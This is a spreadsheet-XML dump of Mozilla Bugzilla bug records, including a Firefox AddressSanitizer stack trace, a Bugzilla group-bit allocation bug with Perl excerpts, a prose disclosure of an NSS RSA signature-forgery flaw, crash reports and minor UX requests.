    #7 0x7f09331465cb in gfxPlatform::GetPlatform() /builds/worker/checkouts/gecko/gfx/thebes/gfxPlatform.cpp:509:5
    #8 0x7f093904cf5b in GetPlatform /builds/worker/workspace/obj-build/dist/include/gfxPlatformGtk.h:31:29
    #9 0x7f093904cf5b in nsWindow::nsWindow() /builds/worker/checkouts/gecko/widget/gtk/nsWindow.cpp:440:19
    #10 0x7f093908c35a in nsIWidget::CreateTopLevelWindow() /builds/worker/checkouts/gecko/widget/gtk/nsWindow.cpp:8094:36
    #11 0x7f093c466f89 in mozilla::AppWindow::Initialize(nsIAppWindow*, nsIAppWindow*, int, int, bool, nsWidgetInitData&amp;) /builds/worker/checkouts/gecko/xpfe/appshell/AppWindow.cpp:208:15
    #12 0x7f093c48c00c in nsAppShellService::JustCreateTopWindow(nsIAppWindow*, nsIURI*, unsigned int, int, int, bool, mozilla::AppWindow**) /builds/worker/checkouts/gecko/xpfe/appshell/nsAppShellService.cpp:710:15
    #13 0x7f093c48cff2 in nsAppShellService::CreateTopLevelWindow(nsIAppWindow*, nsIURI*, unsigned int, int, int, nsIAppWindow**) /builds/worker/checkouts/gecko/xpfe/appshell/nsAppShellService.cpp:173:8
    #14 0x7f093cd52c16 in nsAppStartup::CreateChromeWindow(nsIWebBrowserChrome*, unsigned int, nsIOpenWindowInfo*, bool*, nsIWebBrowserChrome**) /builds/worker/checkouts/gecko/toolkit/components/startup/nsAppStartup.cpp:649:15
    #15 0x7f093cefe3a0 in nsWindowWatcher::CreateChromeWindow(nsIWebBrowserChrome*, unsigned int, nsIOpenWindowInfo*, nsIWebBrowserChrome**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:419:33
    #16 0x7f093cef925f in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, bool, bool, bool, nsIArray*, bool, bool, bool, nsPIWindowWatcher::PrintKind, nsDocShellLoadState*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:947:12
    #17 0x7f093cef6578 in nsWindowWatcher::OpenWindow(mozIDOMWindowProxy*, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, nsTSubstring&lt;char&gt; const&amp;, nsISupports*, mozIDOMWindowProxy**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:293:3
    #18 0x7f093047b7b1 in NS_InvokeByIndex /builds/worker/checkouts/gecko/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:101
    #19 0x7f0932359aa1 in Invoke /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1620:10
    #20 0x7f0932359aa1 in Call /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1176:19
    #21 0x7f0932359aa1 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1142:23
    #22 0x7f093235f7bd in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:925:10
    #23 0x7f093d24a06b in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:503:13
    #24 0x7f093d24a06b in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:594:12
    #25 0x7f093d2348ef in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:647:10
    #26 0x7f093d2348ef in CallFromStack /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:651:10
    #27 0x7f093d2348ef in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309:16
    #28 0x7f093d219e2c in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:473:13
    #29 0x7f093d24fd5f in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, js::AbstractFramePtr, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:839:13
    #30 0x7f093d2e6ca8 in ExecuteInExtensibleLexicalEnvironment(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;) /builds/worker/checkouts/gecko/js/src/builtin/Eval.cpp:492:10
    #31 0x7f093d2e798c in JS::ExecuteInJSMEnvironment(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::StackGCVector&lt;JSObject*, js::TempAllocPolicy&gt; &gt;) /builds/worker/checkouts/gecko/js/src/builtin/Eval.cpp:599:10
    #32 0x7f093d2e7471 in JS::ExecuteInJSMEnvironment(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;) /builds/worker/checkouts/gecko/js/src/builtin/Eval.cpp:554:10
    #33 0x7f0932242d2e in mozJSComponentLoader::ObjectForLocation(ComponentLoaderInfo&amp;, nsIFile*, JS::MutableHandle&lt;JSObject*&gt;, JS::MutableHandle&lt;JSScript*&gt;, char**, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/xpconnect/loader/mozJSComponentLoader.cpp:846:19
    #34 0x7f093224ac7a in mozJSComponentLoader::Import(JSContext*, nsTSubstring&lt;char&gt; const&amp;, JS::MutableHandle&lt;JSObject*&gt;, JS::MutableHandle&lt;JSObject*&gt;, bool) /builds/worker/checkouts/gecko/js/xpconnect/loader/mozJSComponentLoader.cpp:1250:12
    #35 0x7f09303cae3a in mozilla::xpcom::ConstructJSMComponent(nsTSubstring&lt;char&gt; const&amp;, char const*, nsISupports**) /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:1751:3
    #36 0x7f09303b0e44 in mozilla::xpcom::CreateInstanceImpl(mozilla::xpcom::ModuleID, nsISupports*, nsID const&amp;, void**) /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:10931:7
    #37 0x7f09303e7b1c in CreateInstance /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:176:46
    #38 0x7f09303e7b1c in nsComponentManagerImpl::GetServiceLocked(mozilla::Maybe&lt;mozilla::MonitorAutoLock&gt;&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1282:17
    #39 0x7f09303ea1bb in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1471:10
    #40 0x7f09303f00c2 in CallGetService /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:61:43
    #41 0x7f09303f00c2 in nsGetServiceByContractIDWithError::operator()(nsID const&amp;, void**) const /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:253:21
    #42 0x7f0930250dee in nsCOMPtr_base::assign_from_gs_contractid_with_error(nsGetServiceByContractIDWithError const&amp;, nsID const&amp;) /builds/worker/checkouts/gecko/xpcom/base/nsCOMPtr.cpp:91:7
    #43 0x7f093cfcc7c1 in operator= /builds/worker/workspace/obj-build/dist/include/nsCOMPtr.h:1065:5
    #44 0x7f093cfcc7c1 in nsAppStartupNotifier::NotifyObservers(char const*) /builds/worker/checkouts/gecko/toolkit/xre/nsAppStartupNotifier.cpp:46:23
    #45 0x7f093cfbd983 in XREMain::XRE_mainRun() /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:4908:3
    #46 0x7f093cfc08b8 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5330:8
    #47 0x7f093cfc1480 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:5389:21
    #48 0x5631fe569954 in do_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:219:22
    #49 0x5631fe569954 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:337:16
    #50 0x7f09473a7041 in __libc_start_main (/lib64/libc.so.6+0x27041)
==209471==ABORTING
```</t>
        </is>
      </c>
      <c r="X3367" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3368">
      <c r="A3368" t="n">
        <v>167485</v>
      </c>
      <c r="B3368" t="inlineStr">
        <is>
          <t>2002-09-09 05:55:57 -0700</t>
        </is>
      </c>
      <c r="C3368" t="inlineStr">
        <is>
          <t>When "usebuggroups" is on, then assigning of group_id is in error</t>
        </is>
      </c>
      <c r="D3368" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:32 -0800</t>
        </is>
      </c>
      <c r="E3368" t="n">
        <v>1</v>
      </c>
      <c r="F3368" t="n">
        <v>1</v>
      </c>
      <c r="G3368" t="n">
        <v>4</v>
      </c>
      <c r="H3368" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3368" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3368" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3368" t="inlineStr">
        <is>
          <t>2.14.2</t>
        </is>
      </c>
      <c r="L3368" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3368" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3368" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3368" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3368" t="inlineStr">
        <is>
          <t>[fixed for 2.16.1][fixed for 2.14.4]</t>
        </is>
      </c>
      <c r="Q3368" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3368" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3368" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T3368" t="n">
        <v>1</v>
      </c>
      <c r="U3368" t="n">
        <v>0</v>
      </c>
      <c r="V3368" t="n">
        <v>21</v>
      </c>
      <c r="W3368" t="inlineStr">
        <is>
          <t>Hi there
I was going through the code of bugzilla. There in "editproducts.cgi" file, I 
found that when any product is updated then if "usebuggroups" is on then group 
is created if group already does not exist.
While creating the new group, double of the max availble bit is being done. 
Which is not proper as if some one deletes any group OR product then that free 
bit remains unused.
In the file "editgroups.cgi", bit for new group is taken in optimum way as it 
first check for any free available bit, before trying for 2*max(bit).
I think this code must be used whenever any group is being created.
code in editproducts.cgi
==== code ==========
            # Group doesn't exist.  Let's make it, the same way as we make a
            # group for a new product above.
            SendSQL("SELECT MAX(bit) FROM groups");
            my $tmp_bit = FetchOneColumn();
            if($tmp_bit &lt; 256) {
                $bit = 256;
            } else {
                $bit = $tmp_bit * 2;
            }
=============================== End of code in editproducts.cgi ===========
code in editgroups.cgi for same purpose
======== code in editgroups.cgi ======================
    # Major hack for bit values...  perl can't handle 64-bit ints, so I can't
    # just do the math to get the next available bit number, gotta handle
    # them as strings...  also, we're actually only going to allow 63 bits
    # because that's all that opblessgroupset masks for (the high bit is off
    # to avoid signing issues).
    my @bitvals = ('1','2','4','8','16','32','64','128','256','512','1024',
                   '2048','4096','8192','16384','32768',
                   '65536','131072','262144','524288','1048576','2097152',
                   '4194304','8388608','16777216','33554432','67108864',
                   '134217728','268435456','536870912','1073741824',
                   '2147483648',
                   '4294967296','8589934592','17179869184','34359738368',
                   '68719476736','137438953472','274877906944',
                   '549755813888','1099511627776','2199023255552',
                   '4398046511104','8796093022208','17592186044416',
                   '35184372088832','70368744177664','140737488355328',
                   '281474976710656','562949953421312','1125899906842624',
                   '2251799813685248','4503599627370496','9007199254740992',
                   '18014398509481984','36028797018963968','72057594037927936',
                   '144115188075855872','288230376151711744',
                   '576460752303423488','1152921504606846976',
                   '2305843009213693952','4611686018427387904');
    # First the next available bit
    my $bit = "";
    foreach (@bitvals) {
        if ($bit eq "") {
            SendSQL("SELECT bit FROM groups WHERE bit=" . SqlQuote($_));
            if (!FetchOneColumn()) { $bit = $_; }
        }
    }
    if ($bit eq "") {
        ShowError("Sorry, you already have the maximum number of groups " .
                  "defined.&lt;BR&gt;&lt;BR&gt;You must delete a group first before you " .
                  "can add any more.&lt;/B&gt;");
        PutTrailer("&lt;a href=editgroups.cgi&gt;Back to the group list&lt;/a&gt;");
        exit;
    }
=======end of code in editgroups.cgi =-==============
Hope this will be taken care..</t>
        </is>
      </c>
      <c r="X3368" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3369">
      <c r="A3369" t="n">
        <v>523501</v>
      </c>
      <c r="B3369" t="inlineStr">
        <is>
          <t>2009-10-20 17:23:38 -0700</t>
        </is>
      </c>
      <c r="C3369" t="inlineStr">
        <is>
          <t>Add-on submission changes for selecting listed type</t>
        </is>
      </c>
      <c r="D3369" t="inlineStr">
        <is>
          <t>2016-02-04 14:49:13 -0800</t>
        </is>
      </c>
      <c r="E3369" t="n">
        <v>1</v>
      </c>
      <c r="F3369" t="n">
        <v>1</v>
      </c>
      <c r="G3369" t="n">
        <v>6</v>
      </c>
      <c r="H3369" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3369" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3369" t="inlineStr">
        <is>
          <t>Developer Pages</t>
        </is>
      </c>
      <c r="K3369" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="L3369" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3369" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3369" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3369" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3369" t="inlineStr"/>
      <c r="Q3369" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3369" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3369" t="inlineStr">
        <is>
          <t>5.3</t>
        </is>
      </c>
      <c r="T3369" t="n">
        <v>1</v>
      </c>
      <c r="U3369" t="n">
        <v>0</v>
      </c>
      <c r="V3369" t="n">
        <v>26</v>
      </c>
      <c r="W3369" t="inlineStr">
        <is>
          <t>We will need to change the first step of the add-on submission process to be selecting the add-on listing type.
Basic details are in the spec ( http://docs.google.com/Doc?id=dfntthnr_26gdrd3kfv&amp;pli=1 )
It will involve:
* Presenting the user with a choice and explanation of each option
* If the user chooses to host their add-on on AMO, go to the current submission process
* If the user chooses only to list their add-on, we will need to collect some basic data, either through manual input or extraction from the install.rdf.
I will post copy and layout of this page tomorrow.</t>
        </is>
      </c>
      <c r="X3369" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3370">
      <c r="A3370" t="n">
        <v>1069405</v>
      </c>
      <c r="B3370" t="inlineStr">
        <is>
          <t>2014-09-18 08:51:54 -0700</t>
        </is>
      </c>
      <c r="C3370" t="inlineStr">
        <is>
          <t>PKCS#1 v1.5 RSA signature verification vulnerabilities due to ASN.1 parsing of DigestInfo</t>
        </is>
      </c>
      <c r="D3370" t="inlineStr">
        <is>
          <t>2015-08-07 18:47:21 -0700</t>
        </is>
      </c>
      <c r="E3370" t="n">
        <v>1</v>
      </c>
      <c r="F3370" t="n">
        <v>1</v>
      </c>
      <c r="G3370" t="n">
        <v>3</v>
      </c>
      <c r="H3370" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3370" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3370" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3370" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L3370" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3370" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3370" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3370" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P3370" t="inlineStr"/>
      <c r="Q3370" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3370" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3370" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3370" t="n">
        <v>1</v>
      </c>
      <c r="U3370" t="n">
        <v>0</v>
      </c>
      <c r="V3370" t="n">
        <v>67</v>
      </c>
      <c r="W3370" t="inlineStr">
        <is>
          <t>From: Intel Product Security Incident Response Team
	&lt;Intel.Product.Security.Incident.Response.Team@intel.com&gt;
To: "'security@mozilla.org'" &lt;security@mozilla.org&gt;
Subject: NSS Issue
------/------
Intel Security’s Advanced Threat Research (ATR) team has discovered a variant of the signature forgery attack previously published by Daniel Bleichenbacher, which enables this attack to be used to forge RSA certificates on multiple crypto libraries with incorrect implementation of verification. Due to the way affected libraries parse BER encoded fields, it is possible for an attacker to skip garbage bytes, enabling signature forgery. These attacks target RSA keys with a low exponent (such as 3). The vulnerability is due to the implementation of signature checking in particular crypto libraries; each library must be assessed separately for the conditions that allow for the issue. For that reason, the Intel ATR team continues to assess many other libraries. 
Intel's ATR team has recently determined Mozilla NSS to be vulnerable, and the team has a proof of concept using Firefox root certificates. Details are in the attached document.
NOTE: This vulnerability has not been shared publicly, but the team plans to publish eventually. Because a large number of people/products may embed vulnerable libraries and thereby be affected by this issue, Intel PSIRT has requested that CERT/CC lead the coordination of this issue and assign CVEs. They will likely contact you shortly.
Please contact Intel PSIRT at secure@intel.com for updates or additional information. Our PGP key can be retrieved from our website https://security-center.intel.com/PGPPublicKey.aspx.
Thank you,
- John
Intel PSIRT
gpgkeys: key 52E518C5C7B0C436 not found on keyserver</t>
        </is>
      </c>
      <c r="X3370" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3371">
      <c r="A3371" t="n">
        <v>1315938</v>
      </c>
      <c r="B3371" t="inlineStr">
        <is>
          <t>2016-11-08 03:58:58 -0800</t>
        </is>
      </c>
      <c r="C3371" t="inlineStr">
        <is>
          <t>Crash in java.lang.NullPointerException: Attempt to invoke virtual method ''boolean org.mozilla.gecko.Tab.isPrivate()'' on a null object reference at org.mozilla.gecko.home.TwoLinePageRow.updateDisplayedUrl(TwoLinePageRow.java)</t>
        </is>
      </c>
      <c r="D3371" t="inlineStr">
        <is>
          <t>2020-12-21 10:31:17 -0800</t>
        </is>
      </c>
      <c r="E3371" t="n">
        <v>1</v>
      </c>
      <c r="F3371" t="n">
        <v>1</v>
      </c>
      <c r="G3371" t="n">
        <v>6</v>
      </c>
      <c r="H3371" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3371" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3371" t="inlineStr">
        <is>
          <t>Awesomescreen</t>
        </is>
      </c>
      <c r="K3371" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L3371" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3371" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3371" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3371" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3371" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q3371" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3371" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3371" t="inlineStr">
        <is>
          <t>Firefox 52</t>
        </is>
      </c>
      <c r="T3371" t="n">
        <v>1</v>
      </c>
      <c r="U3371" t="n">
        <v>0</v>
      </c>
      <c r="V3371" t="n">
        <v>10</v>
      </c>
      <c r="W3371" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-ce33a3a6-c248-4e4a-8f5c-3be1e2161107.
=============================================================
This is number 10 on Aurora, and is likely to be a simple fix.</t>
        </is>
      </c>
      <c r="X3371" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3372">
      <c r="A3372" t="n">
        <v>454704</v>
      </c>
      <c r="B3372" t="inlineStr">
        <is>
          <t>2008-09-10 16:50:18 -0700</t>
        </is>
      </c>
      <c r="C3372" t="inlineStr">
        <is>
          <t>Crash [@ JS_HashTableRawLookup] with XPCSafeJSObjectWrapper, getter, toSource</t>
        </is>
      </c>
      <c r="D3372" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E3372" t="n">
        <v>1</v>
      </c>
      <c r="F3372" t="n">
        <v>1</v>
      </c>
      <c r="G3372" t="n">
        <v>3</v>
      </c>
      <c r="H3372" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3372" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3372" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3372" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3372" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3372" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3372" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3372" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3372" t="inlineStr">
        <is>
          <t>[sg:critical] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q3372" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3372" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3372" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3372" t="n">
        <v>1</v>
      </c>
      <c r="U3372" t="n">
        <v>0</v>
      </c>
      <c r="V3372" t="n">
        <v>35</v>
      </c>
      <c r="W3372" t="inlineStr">
        <is>
          <t>Created attachment 337991
testcase (crashes Firefox when loaded)
Thread 0 Crashed:
0   JS_HashTableRawLookup + 10 (jshash.cpp:177)
1   MarkSharpObjects(JSContext*, JSObject*, JSIdArray**) + 120 (jsobj.cpp:360)
2   MarkSharpObjects(JSContext*, JSObject*, JSIdArray**) + 750 (jsobj.cpp:418)
3   MarkSharpObjects(JSContext*, JSObject*, JSIdArray**) + 750 (jsobj.cpp:418)
4   js_EnterSharpObject + 277 (jsobj.cpp:475)
5   js_array_join_sub + 141 (jsarray.cpp:1214)
6   array_toString(JSContext*, unsigned int, long*) + 165 (jsarray.cpp:1429)
7   js_Invoke + 1313 (jsinterp.cpp:1189)
...</t>
        </is>
      </c>
      <c r="X3372" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3373">
      <c r="A3373" t="n">
        <v>1557719</v>
      </c>
      <c r="B3373" t="inlineStr">
        <is>
          <t>2019-06-07 07:16:42 -0700</t>
        </is>
      </c>
      <c r="C3373" t="inlineStr">
        <is>
          <t>Display times in graphs as UTC</t>
        </is>
      </c>
      <c r="D3373" t="inlineStr">
        <is>
          <t>2019-09-09 13:20:56 -0700</t>
        </is>
      </c>
      <c r="E3373" t="n">
        <v>1</v>
      </c>
      <c r="F3373" t="n">
        <v>1</v>
      </c>
      <c r="G3373" t="n">
        <v>7</v>
      </c>
      <c r="H3373" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3373" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3373" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K3373" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3373" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3373" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3373" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3373" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3373" t="inlineStr"/>
      <c r="Q3373" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3373" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3373" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3373" t="n">
        <v>1</v>
      </c>
      <c r="U3373" t="n">
        <v>0</v>
      </c>
      <c r="V3373" t="n">
        <v>2</v>
      </c>
      <c r="W3373" t="inlineStr">
        <is>
          <t>Instead of showing times in the user's local timezone, we should standardise on UTC.</t>
        </is>
      </c>
      <c r="X3373" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3374">
      <c r="A3374" t="n">
        <v>482209</v>
      </c>
      <c r="B3374" t="inlineStr">
        <is>
          <t>2009-03-09 03:41:03 -0700</t>
        </is>
      </c>
      <c r="C3374" t="inlineStr">
        <is>
          <t>Remove viewed/useful data in search results listing</t>
        </is>
      </c>
      <c r="D3374" t="inlineStr">
        <is>
          <t>2009-12-16 16:20:50 -0800</t>
        </is>
      </c>
      <c r="E3374" t="n">
        <v>1</v>
      </c>
      <c r="F3374" t="n">
        <v>1</v>
      </c>
      <c r="G3374" t="n">
        <v>5</v>
      </c>
      <c r="H3374" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3374" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3374" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3374" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3374" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3374" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3374" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3374" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3374" t="inlineStr">
        <is>
          <t>sumo_only</t>
        </is>
      </c>
      <c r="Q3374" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3374" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3374" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T3374" t="n">
        <v>1</v>
      </c>
      <c r="U3374" t="n">
        <v>0</v>
      </c>
      <c r="V3374" t="n">
        <v>7</v>
      </c>
      <c r="W3374" t="inlineStr">
        <is>
          <t>In the search results, below the summary of an article we include information like: "viewed 2501 times | 5316 people found this article useful"
This info is not interesting for users and should be removed from the view.
https://wiki.mozilla.org/Support/UX/Audit</t>
        </is>
      </c>
      <c r="X3374" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3375">
      <c r="A3375" t="n">
        <v>774849</v>
      </c>
      <c r="B3375" t="inlineStr">
        <is>
          <t>2012-07-17 13:49:18 -0700</t>
        </is>
      </c>
      <c r="C3375" t="inlineStr">
        <is>
          <t>improve article feedback survey</t>
        </is>
      </c>
      <c r="D3375" t="inlineStr">
        <is>
          <t>2012-07-30 16:03:55 -0700</t>
        </is>
      </c>
      <c r="E3375" t="n">
        <v>1</v>
      </c>
      <c r="F3375" t="n">
        <v>1</v>
      </c>
      <c r="G3375" t="n">
        <v>5</v>
      </c>
      <c r="H3375" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3375" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3375" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3375" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3375" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3375" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3375" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3375" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3375" t="inlineStr">
        <is>
          <t>u=user c=wiki p=2</t>
        </is>
      </c>
      <c r="Q3375" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3375" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3375" t="inlineStr">
        <is>
          <t>2012.14</t>
        </is>
      </c>
      <c r="T3375" t="n">
        <v>1</v>
      </c>
      <c r="U3375" t="n">
        <v>0</v>
      </c>
      <c r="V3375" t="n">
        <v>12</v>
      </c>
      <c r="W3375" t="inlineStr">
        <is>
          <t>In the article feedback survey, when the user clicks no:
* He should not be able to click just "other", without being able to leave a comment
* He should not be able to input free form text without selecting one of the options.
* The options should be radio boxes, not check boxes, so only one option can be selected at a time.
